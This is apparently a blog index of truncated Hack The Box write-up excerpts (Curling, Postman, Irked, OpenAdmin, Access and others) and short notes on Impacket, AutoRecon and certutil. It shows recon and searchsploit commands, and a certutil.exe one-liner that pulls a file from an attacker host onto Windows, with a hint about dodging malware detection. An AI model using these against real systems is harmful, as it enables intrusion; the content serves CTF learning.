HTB Curling

$ nmap -T4 -A -p- $ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt dir -u -e If we access to, we’ll find a Joomla login form. Accessing to, Based on the published post there are these users: Super User Floris Watching on the source code, there is a suspicious secret.txt file somewhere. This string seems to be encoded. Searching for: «linux decode string», Google give us the suggestion of

HTB Postman

$ nmap -A -p- -T4 Open ports: 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) 6379/tcp open redis Redis key-value store 4.0.9 10000/tcp open http MiniServ 1.910 (Webmin httpd) $ gobuster dir -u -w Access to Access to Access to Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache and

HTB Writeup

$ nmap -A -T4 -p- -sV Although nmap says port 80 is open, it also appears to be as tcpwrapped.What does it mean? Tcpwrapped refers to tcpwrapper, a host-based network access control program on Unix and Linux. When Nmap labels something tcpwrapped, it means that the behavior of the port is consistent with one that is protected by tcpwrapper. Specifically, it means that a full TCP handshake was completed,

HTB Irked

$ nmap -A -T4 -p- Access to According to Nmap’s results, we have open these ports related to UrealIRCd: 6697/tcp open irc UnrealIRCd 8067/tcp open irc UnrealIRCd 65534/tcp open irc UnrealIRCd (Admin email djmardov@irked.htb) As we have an IRC in this box let’s start trying to connect to it. $ sudo irssi 65534 According to this, we have a UnrealIRC version $ searchsploit unrealirc Exploiting UnrealIRC

HTB OpenAdmin

Enumeration $ nmap -A -T4 -p- $ gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e Access to Access to There is a login link. Click and you’ll be redirected to Based on this screenshot, we have an OpenNetAdmin (v18.1.1) Access to Access to Vulnerability analysis $ searchsploit opennetadmin $ searchsploit -x 47691 The -d option in Curl means data. -d, –data: (HTTP MQTT) Sends the specified data in a POST

HTB Friendzone

$ sudo nmap -A -T4 -p- $ gobuster -w /usr/share/wordlists/dirb/common.txt dir -u Access to Acess to We discovered that SSL cert is using a common name as (it is a vhost).So we can access then to (after this host was added to the /etc/host file) We can do a zone transfer for that domain I saw earlier on the main page and get the

HTB Access

$ nmap -A -T4 -p- Open ports detected:• 21/tcp open ftp Microsoft ftpd• 23/tcp open telnet?• 80/tcp open http Microsoft IIS httpd 7.5 $ ftp ftp> dir ftp> cd Backupsftp> dir ftp> get backup.mdb ftp> cd ..ftp> dir ftp> cd Engineerftp> dir ftp> get «Access» Files haven’t been correctly downloaded.By default, ftp mode set for text files.We need to download again this files but this time using

Impacket installation

Impacket is a collection of Python classes for working with network protocols. Installation process: Download last release. Extract the file. Install the requirements. Install the package. $ pip install -r requirements.txt If we have an error installing wheel package, we can do it individually. $ pip install wheel Now run the configuration script. $ python bdist_wheel Let’s try to install the requirements again: $ pip install -r requirements.txt

Download a file using Certutil.exe

Certutil.exe can be used to download a file to a Windows machine. This command will download the «file» in the Windows machine from «http://<ip>« certutil.exe -urlcache -split -f http:///file file Depending on the file, it could be detected as malicious and then be blocked. A possible solution may be using the method described in this post from The trick is based on a base64 encoding file when sending the

Autorecon install

AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services. It is intended as a time-saving tool for use in CTFs and other penetration testing environments (e.g. OSCP). It may also be useful in real-world engagements. Run installation script $ python3 -m pip install git+ Add /home/ruben/.local/bin to your PATH. Other requirements installation: & sudo apt install seclists curl enum4linux gobuster nbtscan nikto nmap onesixtyone oscanner